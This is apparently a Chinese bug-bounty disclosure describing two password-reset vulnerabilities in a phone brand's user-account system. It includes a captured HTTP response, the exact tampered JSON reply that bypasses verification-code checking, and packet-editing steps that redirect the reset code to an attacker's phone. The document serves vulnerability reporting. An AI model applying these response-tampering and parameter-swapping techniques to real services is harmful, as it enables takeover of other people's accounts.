本地验证

案例：某品牌手机重置任意用户密码漏洞(4)

某品牌手机之前我自己发过重置的3次了，别人也以不同姿势重置了N次，简直..

今天看到noob又提交了一个，于是再去看看。

审核的时候麻烦先帮我看看与http://www.xxxx.xxx/xxx/xxx-2014-069xxx 是否重复，如重复勿过。

详细说明：

https://xxx.xxx.com/xxx.xxx?q=user/getbackpass&back=http%3A%2F%2Fwww.xxxx.com%2F

找回密码，输入要找回的手机号，以找回手机号：1372378xxxx示例

https://xxx.xxx.com/xxx.xxx?q=user/confirmid&type=1&sign=e9fb209c9416fb0312980c47c4537f0b

获取验证码-随便输入一个验证码，提交确认的时候response拦截

收到响应：

HTTP/1.1 200 OK

Server: nginx

Date: Mon, 28 Jul 2014 04:15:39 GMT

Content-Type: text/html;charset=utf-8

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: Zandy/1.0

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Mon, 28 Jul 2014 04:15:38 GMT

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Pragma: no-cache

X-Server-ID: web106

Content-Length: 56

{"flag":-4,"msg":"\u9a8c\u8bc1\u7801\u4e0d\u6b63\u786e"}

修改为：

{"flag":1,"msg":"?q=user\/resetPass&username=&type=1&sign=e9fb209c9416fb0312980c47c4537f0b"}

Forward出去响应包，即可绕过重置验证。

设置密码，直接提交，帐号密码为 1372378xxxx：wooxxx123

案例：某品牌手机修改任意帐号密码-2

1.使用找回密码功能，输入指定要找回密码的帐户，本次测试以官方帐号“某品牌手机社区”为例，使用抓包工具抓包

返回如下数据包

2.将数据包中的acctype值改为1，去掉email，修改mobie为自己的手机号码

继续提交

3.自己的手机将会收到验证码，填入收到的验证码和新密码即可完成